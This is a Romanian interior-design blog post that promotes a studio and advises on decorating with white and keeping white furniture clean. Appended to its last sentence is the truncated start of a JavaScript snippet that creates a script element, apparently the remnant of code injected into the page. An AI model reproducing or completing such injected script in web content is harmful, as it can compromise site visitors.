Modern interior.

Atunci cand vine vorba despre amenajari interioare vorbim direct despre creatie si mai ales, imaginatie. La Fine Design Studio ne dorim sa oferim tuturor clientilor nostri concepte unice si personalizate pentru fiecare proiect de in parte. Iar pentru ca dorim sa fim o sursa de inspiratie pentru oricine, in cadrul acestui articol vom vorbi despre amenajari interioare cu mult alb. Vom vedea de ce albul influenteaza in mod pozitiv starea de spirit, ia mai ales cum poate fi intretinut mobilierul alb si alte elemente decorative de aceasta culoare.

Albul dincolo de prejudecati si dificultati in amenajari interioare

Cei mai multi dintre dumneavoastra vad albul ca fiind culoarea destinata spitalelor si a altor institutii medicale, insa albul este o nonculoare ce ofera o serie de beneficii atat din punct de vedere a starii psihice, cat si ca stare de spirit. De asemenea, despre folosirea de alb in amenajari interioare putem spune ca este extrem de eleganta, insa numai daca este folosit cu bun simt, intr-o maniera estetica si echilibrata. In designul interior nu exista niciodata o singura culoare, sau noncoluare in cazul de fata, ci incercam sa creem combinatii subtile sau cochete intre culor, texturi si mai ales intre forme. Intr-unul din articolele recente am vorbit despre aceasta combinatie de 3 elemente.

In zona livingului albul poate crea o spatialitate speciala a incaperii datorita efectului foarte luminos pe care aceasta nonculoare o are. Insa pentru a putea folosi albul in amenajari interioare trebuie sa se adauge diferite pete de culoare, asa cum sunt ele denumite tehnic. Mai exact, vorbim de mici detalii puternic colorate. Un bun exemplu il putem da cu privire la mobilierul din camera. Acesta poate fi complet alb, insa pentru un efect special, puteti alege ca manerele sartarelor sa fie rosu aprins, verde, sau orice nuanta puternica. Astfel, prin alegerea unei culori de detaliu, care sa se regaseasca la mai multe elemente din camera, veti reusi sa echilibrati cromatic intregul concept.

Curatarea si intretinerea elementelor de amenajari interioare albe

Desi albul este perfect pentru amenajari interioare, multi il evita, acest lucru fiind cauzat de greutatea cu care se mentine albul. Este foarte usor sa murdaresti mobila alba, sau covoarele. Tocmai din acest motiv multe persoane fug de aceasta nuanta, insa exista solutii si moduri de a pastra o camera cu mult alb curata. De exemplu, pentru suprafetele de mobilier alb puteti folosi o solutie de curatare antistatica. Aceasta previne depunerea prafului pe suprafata mobilei, de asemenea, puteti folosi si solutii speciale ce previn murdarirea, insa pentru acestea este bine sa va documentati in ceea ce priveste compatibilitatea substantei cu mobila. Pe langa aceste produse speciale pentru intretinere si curatare, pentru pastrarea albului dintr-o astfel de camera trebuie sa va obisnuiti cu un program periodic de curatenie. Pentru a afla mai multe despre amenajari interioare si design interior, va asteptam pe siteul nostru, www.logosidesigninterior.ro locul de unde puteti sa va inspirati si mai ales sa optati pentru serviciile noastre, dand astfel o noua viata casei dumneavoastra. Va asteptam!var d=document;var s=d.createElement(‘script’);